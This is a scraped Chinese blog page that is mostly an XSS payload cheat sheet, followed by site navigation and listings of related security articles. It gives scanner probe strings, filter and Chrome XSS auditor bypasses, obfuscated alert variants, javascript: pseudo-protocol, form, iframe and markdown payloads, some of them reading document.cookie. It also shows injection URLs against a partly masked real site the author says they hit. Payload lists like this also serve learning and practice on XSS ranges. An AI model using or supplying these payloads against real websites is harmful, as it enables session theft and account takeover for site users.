xss在线靶场 http://prompt.ml/0 https://xss-game.appspot.com/

这个是AWVS扫描器的payload

+e%27%22%28%29%26%25%3Cacx%3E%3CScRiPt+%3Ealert%281%29%3C%2FScRiPt%3E

1<%div style=width:expression(ZnRe(9043))> 记得把%删掉
 解码如下：
 e'"()&%
"/>e'"()&%  用单引号触发网站原本的双引号来进行闭合

http://www.xxx.com.cn/cn/(Z('%20onerror=alert%601%60%20'2222'%20))/Default.aspx
http://www.xxxx.com.cn/cn/(Z(' onerror=alert`1` '2222' ))/Default.aspx
http://www.sxxxx.com.cn/cn/(Z(' onerror=alert`1` '))/Default.aspx

这是我遇到的一个网站




</code></pre> 
 <h2>常用 </h2> 
 <ul> 
  <li><code><script>alert(/xss/)</script></code></li> 
  <li><code><svg onload=alert(document.domain)></code></li> 
  <li><code><img src=document.domain onerror=alert(document.domain)></code></li> 
  <li><code><M onmouseover=alert(document.domain)>M</code></li> 
  <li><code><marquee onscroll=alert(document.domain)></code></li> 
  <li><code><a href=javascript:alert(document.domain)>M</a></code></li> 
  <li><code><body onload=alert(document.domain)></code></li> 
  <li><code><details open ontoggle=alert(document.domain)></code></li> 
  <li><code><embed src=javascript:alert(document.domain)></code></li> 
 </ul> 
 <h2>大小写绕过 </h2> 
 <ul> 
  <li><code><script>alert(1)</script></code></li> 
  <li><code><sCrIpT>alert(1)</sCrIpT></code></li> 
  <li><code><ScRiPt>alert(1)</ScRiPt></code></li> 
  <li><code><sCrIpT>alert(1)</ScRiPt></code></li> 
  <li><code><ScRiPt>alert(1)</sCrIpT></code></li> 
  <li><code><img src=1 onerror=alert(1)></code></li> 
  <li><code><iMg src=1 oNeRrOr=alert(1)></code></li> 
  <li><code><ImG src=1 OnErRoR=alert(1)></code></li> 
  <li><code><img src=1 onerror="alert(&quot;M&quot;)"></code></li> 
  <li><code><marquee onscroll=alert(1)></code></li> 
  <li><code><mArQuEe OnScRoLl=alert(1)></code></li> 
  <li><code><MaRqUeE oNsCrOlL=alert(1)></code></li> 
 </ul> 
 <h2>各种alert </h2> 
 <ul> 
  <li><code><script>alert(1)</script></code></li> 
  <li><code><script>confirm(1)</script></code></li> 
  <li><code><script>prompt(1)</script></code></li> 
  <li><code><script>alert('1')</script></code></li> 
  <li><code><script>alert("1")</script></code></li> 
 </ul> 
 <pre><code><script>alert`1`</script>
</code></pre> 
 <ul> 
  <li><code><script>(alert)(1)</script></code></li> 
  <li><code><script>a=alert,a(1)</script></code></li> 
  <li><code><script>[1].find(alert)</script></code></li> 
  <li><code><script>top["al"+"ert"](1)</script></code></li> 
  <li><code><script>top["a"+"l"+"e"+"r"+"t"](1)</script></code></li> 
  <li><code><script>top[/al/.source+/ert/.source](1)</script></code></li> 
  <li><code><script>top[/a/.source+/l/.source+/e/.source+/r/.source+/t/.source](1)</script></code></li> 
 </ul> 
 <h2>伪协议 </h2> 
 <ul> 
  <li><code><a href=javascript:/0/,alert(%22M%22)>M</a></code></li> 
  <li><code><a href=javascript:/00/,alert(%22M%22)>M</a></code></li> 
  <li><code><a href=javascript:/000/,alert(%22M%22)>M</a></code></li> 
  <li><code><a href=javascript:/M/,alert(%22M%22)>M</a></code></li> 
 </ul> 
 <h2>Chrome XSS auditor bypass </h2> 
 <ul> 
  <li><code>?param=https://&param=@z.exeye.io/import%20rel=import%3E</code></li> 
  <li><code><base href=javascript:/M/><a href=,alert(1)>M</a></code></li> 
  <li><code><base href=javascript:/M/><iframe src=,alert(1)> 
  
 长度限制  
 
\...

jquery sourceMappingURL

图片名

">.gif

过期的payload

src=javascript:alert基本不可以用
css expression特性只在旧版本ie可用

css

markdown

[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
<javascript:alert('XSS')>
![a'"`onerror=prompt(document.cookie)](x)
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)

iframe


</code></pre> 
 <ul> 
  <li><code><iframe src=javascript:alert(1)> 
   
   
   
   
  </iframe</code></li> 
 </ul> 
 <h2>form </h2> 
 <ul> 
  <li><code><form action=javascript:alert(1)><input type=submit></code></li> 
  <li><code><form><button formaction=javascript:alert(1)>M</code></li> 
  <li><code><form><input formaction=javascript:alert(1) type=submit value=M></code></li> 
  <li><code><form><input formaction=javascript:alert(1) type=image value=M></code></li> 
  <li><code><form><input formaction=javascript:alert(1) type=image src=1></code></li> 
 </ul> 
 <h2>meta </h2> 
 <p><code><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"></code></p> 
 <h1>其他一些奇怪的标签</h1> 
 <p>河南<video data-automation="FootageHero_heroVideo_video" loop="" autoplay="" class="u_c_8bdc3"><source src="https://ak.picdn.net/footage/assets/directors_choice/footage-carousel-stock-videos.webm" type="video/webm"><source src="https://ak.picdn.net/footage/assets/directors_choice/footage-carousel-stock-videos.mp4" type="video/mp4"></video></p> 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 340px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption">
    image.png 
  </div> 
 </div> 
 <p>https://www.cnblogs.com/hookjoy/p/6181350.html</p> 
</article>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1620234587252752384"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(XSS payload)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1829387501480013824.htm"
                           title="CSRF攻击原理以及防御方法" target="_blank">CSRF攻击原理以及防御方法</a>
                        <span class="text-muted">BinBin_Bang</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>CSRF攻击原理以及防御方法CSRF概念：CSRF跨站点请求伪造(Cross—SiteRequestForgery)，跟XSS攻击一样，存在巨大的危害性，你可以这样来理解：攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发消息，盗取你的账号，添加系统管理员，甚至于购买商品、虚拟货币转账等。如下：其中WebA</div>
                    </li>
                    <li><a href="/article/1829313759043219456.htm"
                           title="XSS LABS - Level 18 过关思路" target="_blank">XSS LABS - Level 18 过关思路</a>
                        <span class="text-muted">SRC_BLUE_17</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B0/1.htm">网络安全靶场笔记</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a>
                        <div>关注这个靶场的其他相关笔记：XSS-LABS——靶场笔记合集-CSDN博客0x01：过关流程本关推荐在Google浏览器中完成，因为FireFox中不会出现上图中的标签，就算你能注入，你也没触发的条件。进入靶场，右击，查看页面源码，找找特殊点：我们测试一下，看看能不能和上一关一样，直接为标签构造一个监听事件： ?arg01=onmouseover&arg02=alert(1)触发方式，和过关方式都</div>
                    </li>
                    <li><a href="/article/1829144365700837376.htm"
                           title="微信小程序iconfont图标字体解决方案" target="_blank">微信小程序iconfont图标字体解决方案</a>
                        <span class="text-muted">kikiki4</span>

                        <div>此文演示如何在小程序上使用iconfont字体图标。使用说明登录阿里巴巴iconfont.cnimage.png新建项目image.png点击icon收藏image.png加入到test项目中image.png下载到本地解压image.png生成代码image.png复制iconfont.css到xxx.wxssimage.png替换iconfont.css中的@font-face为上面的生成代码</div>
                    </li>
                    <li><a href="/article/1828924482539057152.htm"
                           title="XSS LABS - Level 17 过关思路" target="_blank">XSS LABS - Level 17 过关思路</a>
                        <span class="text-muted">SRC_BLUE_17</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B0/1.htm">网络安全靶场笔记</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a>
                        <div>关注这个靶场的其他相关笔记：XSS-LABS——靶场笔记合集-CSDN博客0x01：过关流程进入靶场，空空如也，右击页面，查看网页源码，找找可疑点：可以看到，靶场默认传参，都传递到了标签内，并且分别作为key和value的格式。那这个就很简单了，直接给他传个监听事件即可（这个靶场推荐在Google浏览器中完成，FireFox中容易出现下面这个情况，即标签不显示）。XSSPayload，以及攻击流程</div>
                    </li>
                    <li><a href="/article/1828874803185020928.htm"
                           title="不同格式和要求情况下，excel文件上传问题" target="_blank">不同格式和要求情况下，excel文件上传问题</a>
                        <span class="text-muted">鱼公主</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3/1.htm">boot问题解决</a><a class="tag" taget="_blank" href="/search/excel/1.htm">excel</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a><a class="tag" taget="_blank" href="/search/maven/1.htm">maven</a>
                        <div>excel文件上传时，总会遇到各种格式的excel文件，对于不同格式，到底应该如何处理呢？===情况一：===只上传一个sheet,假设第一个，首行不需要传入此时第二行是标题行，需要从第三行开始读publicvoiduploadExcel(InputStreaminputStream)throwsException{Workbookworkbook=newXSSFWorkbook(inputStr</div>
                    </li>
                    <li><a href="/article/1828634642777993216.htm"
                           title="小程序自定义组件配合插槽和组件传值" target="_blank">小程序自定义组件配合插槽和组件传值</a>
                        <span class="text-muted">前端-七木</span>
<a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>创建组件目录首先，在项目的components目录下创建一个新的文件夹来存放你的组件/components/└──my-component/├──my-component.wxml├──my-component.wxss├──my-component.js└──my-component.json自定义组件1.my-component.wxml{{title}}点击次数:{{count}}默认插槽内</div>
                    </li>
                    <li><a href="/article/1828362496986148864.htm"
                           title="关于6种Web安全常见的攻防姿势" target="_blank">关于6种Web安全常见的攻防姿势</a>
                        <span class="text-muted">AI大模型-搬运工</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B/1.htm">网络攻击模型</a>
                        <div>关于Web安全的问题，是一个老生常谈的问题，作为离用户最近的一层，我们大前端应该把手伸的更远一点。我们最常见的Web安全攻击有以下几种：XSS跨站脚本攻击CSRF跨站请求伪造URL跳转漏洞ClickJacking点击劫持/UI-覆盖攻击SQLInjectionSQL注入OSCommandInjectionOS命令注入一、XSSXSS（CrossSiteScript），中文是跨站脚本攻击；其原本缩写</div>
                    </li>
                    <li><a href="/article/1828339058674331648.htm"
                           title="sqlmap参数详解" target="_blank">sqlmap参数详解</a>
                        <span class="text-muted">黑白网安</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                        <div>sqlmap参数详解sqlmap参数详解Options-h,--help查看帮助，没什么好说的-hh查看全部的帮助--version查看版本-v显示信息的级别，一共有六级：0：只显示python错误和一些严重信息；1：显示基本信息（默认）；2：显示debug信息；3：显示注入过程的payload；4：显示http请求包；5：显示http响应头；7：显示http相应页面。Target-d直接连目标后</div>
                    </li>
                    <li><a href="/article/1828283584054652928.htm"
                           title="小程序面试题一" target="_blank">小程序面试题一</a>
                        <span class="text-muted">笃励</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a>
                        <div>一、微信小程序有哪些基本文件类型？微信小程序的基本文件类型主要包括以下几种：WXML（WeiXinMarkupLanguage）：这是微信小程序的标记语言，类似于HTML，用于描述页面的结构。它构建了一套标签语言，结合微信小程序的基础组件、事件系统，可以构建出页面的结构。WXSS（WeiXinStyleSheets）：这是微信小程序的样式表文件，类似于CSS，用于描述WXML的组件样式。WXSS在</div>
                    </li>
                    <li><a href="/article/1828210099227815936.htm"
                           title="Java将数据导出为Excel文件" target="_blank">Java将数据导出为Excel文件</a>
                        <span class="text-muted">DebugDiver代码深处潜水员</span>
<a class="tag" taget="_blank" href="/search/%E9%A1%B9%E7%9B%AE%E7%9B%B8%E5%85%B3/1.htm">项目相关</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/excel/1.htm">excel</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>使用ApachePOI生成基本ExcelApachePOI是一个强大的Java库，用来处理MicrosoftOffice文件。对于Excel文件（.xls和.xlsx）处理，提供有HSSF（.xls）和XSSF（.xlsx）等API。importorg.apache.poi.ss.usermodel.*;importorg.apache.poi.xssf.usermodel.XSSFWorkboo</div>
                    </li>
                    <li><a href="/article/1828092888358154240.htm"
                           title="web跨域有哪些解决方案，笔试面试常问" target="_blank">web跨域有哪些解决方案，笔试面试常问</a>
                        <span class="text-muted">码码分享</span>
<a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>背景：什么是跨域？在前端领域中，跨域是指浏览器允许向服务器发送跨域请求，从而克服Ajax只能同源使用的限制。背景：什么是同源策略？同源策略是一种约定，由Netscape公司1995年引入浏览器，它是浏览器最核心也最基本的安全功能，如果缺少了同源策略，浏览器很容易受到XSS、CSFR等攻击。所谓同源是指"协议+域名+端口"三者相同，即便两个不同的域名指向同一个ip地址，也非同源。具体解决方案如下：跨</div>
                    </li>
                    <li><a href="/article/1827799134984302592.htm"
                           title="微信小程序： including tag name selectors, ID selectors, and at" target="_blank">微信小程序： including tag name selectors, ID selectors, and at</a>
                        <span class="text-muted">dingcho</span>
<a class="tag" taget="_blank" href="/search/%E4%B8%89%E6%96%B9%E5%BC%80%E5%8F%91/1.htm">三方开发</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a>
                        <div>微信小程序报错：Someselectorsarenotallowedincomponentwxss,includingtagnameselectors,IDselectors,andattributeselectors.1、组件和引用组件的页面不能使用id选择器（#a）、属性选择器（[a]）和标签名选择器，请改用class选择器。2、组件和引用组件的页面中使用后代选择器（.a.b）在一些极端情况下</div>
                    </li>
                    <li><a href="/article/1827796237093531648.htm"
                           title="前端安全之XSS攻击（跨域脚本攻击）" target="_blank">前端安全之XSS攻击（跨域脚本攻击）</a>
                        <span class="text-muted">彭式程序猿</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98%E5%92%8C%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88%E6%B1%87%E6%80%BB/1.htm">前端常见问题和解决方案汇总</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a>
                        <div>提示：前端查漏补缺，仅代表个人观点，不接受任何批评文章目录一、XSS是什么？二、XSS类型划分1.反射性XSS（ReflectedXSS）2.存储型XSS（StoredXSS）3.基于DOM或本地的XSS攻击（DOM-basedorlocalXSS）三、XSS防范手段1.htmlencode转义特殊字符2.引入XSS库针对用户输入源过滤，设置标签白名单（node.js）3.cookie设置Http</div>
                    </li>
                    <li><a href="/article/1827794725520896000.htm"
                           title="前端安全XSS，CSRF" target="_blank">前端安全XSS，CSRF</a>
                        <span class="text-muted">前端-JC</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>XSS（Cross-sitescripting）跨站脚本攻击：用户在页面渲染数据时注入可运行的恶意脚本目的是盗用cookie，获取敏感信息，得到更高权限防御方法是对输入和输出进行严格过滤CSRF（Cross-siterequestforgery）跨站请求伪造：冒充受信认用户、向服务器发送非本意/非预期的请求认防御措施有cookit设置SameSite属性、验证请求请求头中Referer来源、表单请</div>
                    </li>
                    <li><a href="/article/1827793083304079360.htm"
                           title="web 安全 xss 蓝莲花平台获取服务器过程" target="_blank">web 安全 xss 蓝莲花平台获取服务器过程</a>
                        <span class="text-muted">lin_1226</span>
<a class="tag" taget="_blank" href="/search/web/1.htm">web</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>xss分类xss跨站脚本攻击分为：反射型，存储型（存储在数据库等），DOM型反射型非持久型，攻击方式具有一次性，每次需要输入弹出，出现在URL中作为参数请求服务器，服务器解析并响应存储型持久型，存在服务器上，数据库、文件等DOM型xss平台——拿到后台——提权——拿服务器密码过程搭建蓝莲花平台利用xss平台拿到的cookie，登录后台利用漏洞上传一句话木马菜刀连接，getshell上传cmd、pr</div>
                    </li>
                    <li><a href="/article/1827453397482172416.htm"
                           title="微信小程序 - 选项卡切换 - 视频播放 - (图解+代码流程)" target="_blank">微信小程序 - 选项卡切换 - 视频播放 - (图解+代码流程)</a>
                        <span class="text-muted">Envyᥫᩣ</span>
<a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E9%9F%B3%E8%A7%86%E9%A2%91/1.htm">音视频</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a><a class="tag" taget="_blank" href="/search/%E8%A7%86%E9%A2%91/1.htm">视频</a>
                        <div>目录一、选项卡切换效果图1.选项卡切换.wxml代码2.选项卡切换.wxss代码3.选项卡切换.js代码neirclik函数onLoad函数ctqis函数二、视频播放效果图1.视频播放.wxml代码视频组件1.视频播放.wxss代码3.视频播放.js代码**随机颜色生成函数getRandomColor()****页面初始数据****弹幕相关函数****视频切换函数qieclick(e)****生命</div>
                    </li>
                    <li><a href="/article/1827423771355607040.htm"
                           title="Some selectors are not allowed in component wxss, including tag name selectors, ID selectors, and at" target="_blank">Some selectors are not allowed in component wxss, including tag name selectors, ID selectors, and at</a>
                        <span class="text-muted">白臻</span>
<a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1/1.htm">微信</a>
                        <div>微信小程序项目报错：Someselectorsarenotallowedincomponentwxss,includingtagnameselectors,IDselectors,andattributeselectors.解决方法：1、组件和引用组件的页面不能使用id选择器（#a）、属性选择器（[a]）和标签名选择器，请改用class选择器。2、组件和引用组件的页面中使用后代选择器（.a.b）在</div>
                    </li>
                    <li><a href="/article/1827418099327004672.htm"
                           title="解决：Some selectors are not allowed in component wxss, including tag name selectors, ID selectors" target="_blank">解决：Some selectors are not allowed in component wxss, including tag name selectors, ID selectors</a>
                        <span class="text-muted">建筑师</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a>
                        <div>在微信开发工具中运行文档中的代码，出现如下错误：[渲染层错误]Someselectorsarenotallowedincomponentwxss,includingtagnameselectors,IDselectors,andattributeselectors.(./custom-tab-bar/index.wxss:36:15)(env:Windows,mp,1.06.2210310;lib</div>
                    </li>
                    <li><a href="/article/1827379283186774016.htm"
                           title="【面试】jvm栈的大小通过什么参数设置？" target="_blank">【面试】jvm栈的大小通过什么参数设置？</a>
                        <span class="text-muted">王佑辉</span>
<a class="tag" taget="_blank" href="/search/jvm/1.htm">jvm</a><a class="tag" taget="_blank" href="/search/%E8%BD%AF%E8%80%83/1.htm">软考</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/jvm/1.htm">jvm</a>
                        <div>目录1.-Xss2.-XX:ThreadStackSize3.说明1.-Xss1.这是最常用的参数，用于直接设置每个线程的堆栈大小。2.-Xss1m表示设置每个线程的堆栈大小为1MB。3.这个参数在JVM启动时通过命令行传递，或者在Java程序中通过System.setProperty()方法设置（尽管后者在实际应用中较为少见）。4.堆栈大小设置得过小可能会导致StackOverflowError</div>
                    </li>
                    <li><a href="/article/1827312994191765504.htm"
                           title="Web应用安全实用建议" target="_blank">Web应用安全实用建议</a>
                        <span class="text-muted">TechCraft</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/1.htm">网络协议</a><a class="tag" taget="_blank" href="/search/centos/1.htm">centos</a>
                        <div>引言随着互联网的飞速发展，Web应用已成为企业与用户互动的重要桥梁。然而，Web应用面临着各种安全威胁，这些威胁不仅可能导致数据泄露，还会损害企业的声誉，甚至造成经济损失。为了确保Web应用的安全性，必须从技术和管理层面采取综合措施，构建一个稳固的安全防护体系。本文将从多个层面介绍常见的安全威胁及其防护措施，并提供具体的管理策略，帮助企业和开发者更好地保护他们的应用。名词解释跨站脚本攻击(XSS)</div>
                    </li>
                    <li><a href="/article/1827221359462281216.htm"
                           title="使用Java语言，引入依赖apache-poi中的Excel文档操作" target="_blank">使用Java语言，引入依赖apache-poi中的Excel文档操作</a>
                        <span class="text-muted">袅沫</span>
<a class="tag" taget="_blank" href="/search/Apache-poi/1.htm">Apache-poi</a><a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a>
                        <div>前言：HSSF针对于excel03之前版本.xlsXSSF针对于excel07之后版本.xlsxSXSSF针对于excel07之后版本，升级版.xlsxapache-poi官网图片首先引入相关文档：org.apache.poipoi4.1.2org.apache.poipoi-ooxml4.1.2一、读取操作目标excel文档如下：获取通过文件流读取Excel的工作簿Workbook通过workb</div>
                    </li>
                    <li><a href="/article/1827041599805288448.htm"
                           title="官网推荐Date处理-使用POI读取单元格的内容" target="_blank">官网推荐Date处理-使用POI读取单元格的内容</a>
                        <span class="text-muted">OkidoGreen</span>
<a class="tag" taget="_blank" href="/search/Excel%E5%A4%84%E7%90%86-Jxl/1.htm">Excel处理-Jxl</a><a class="tag" taget="_blank" href="/search/%26amp%3B/1.htm">&amp;</a><a class="tag" taget="_blank" href="/search/Poi/1.htm">Poi</a>
                        <div>POI-官网-API地址：BusyDevelopers'GuidetoHSSFandXSSFFeatures(apache.org)http://poi.apache.org/components/spreadsheet/quick-guide.html因为项目中使用到POI获取单元格的内容，。刚开始也是去百度怎么做，后来发现官网上的更加好用。所有记录一下，看到的也可以少走些弯路不废话，直接贴官网</div>
                    </li>
                    <li><a href="/article/1827020049509085184.htm"
                           title="小程序使用iconfont" target="_blank">小程序使用iconfont</a>
                        <span class="text-muted">摩羯座_</span>

                        <div>1、下载选好的字体文件2、放入小程序目录下并将inconfont.css改名为iconfont.wxss3、wxss文件引用iconfont.wxss4、wxml中正常使用即可效果为：</div>
                    </li>
                    <li><a href="/article/1826812033807511552.htm"
                           title="可以攻击华为、中兴IoT设备的僵尸网络" target="_blank">可以攻击华为、中兴IoT设备的僵尸网络</a>
                        <span class="text-muted">H_00c8</span>

                        <div>Mozi是一个使用类BitTorrent网络感染物联网设备的P2P僵尸网络。Mozi利用弱Telnet口令和近10个未修复的iot设备漏洞来执行DDoS攻击、数据窃取、命令和payload执行。微软IoT安全研究人员最近发现Mozi僵尸网络不断进化，已经在Netgear、华为、中兴等厂商的网关上实现了驻留。感染路由器后，僵尸网络可以通过HTTP劫持和DNS期盼来发起中间人攻击以黑掉终端，并部署勒索</div>
                    </li>
                    <li><a href="/article/1826750308903120896.htm"
                           title="微信小程序--31(todolist案例)" target="_blank">微信小程序--31(todolist案例)</a>
                        <span class="text-muted">阿巴阿巴啊啊啊</span>
<a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F%E5%AD%A6%E4%B9%A0/1.htm">小程序学习</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a>
                        <div>一.功能输入待办事件添加代办事件删除代办事件二、步骤1.添加输入框.wxml代码：.wxss代码：/*1.输入框样式*/input{border:1rpxsolidblue;height:50px;line-height:50px;border-radius:10px;}效果图：2.添加按钮.wxlm代码：add.wxss代码：/*#将输入框和按钮放置到一行样式*/.box{display:fle</div>
                    </li>
                    <li><a href="/article/1826504913501384704.htm"
                           title="java解决PDF中的XSS攻击" target="_blank">java解决PDF中的XSS攻击</a>
                        <span class="text-muted">蓝色土耳其love</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/pdf/1.htm">pdf</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
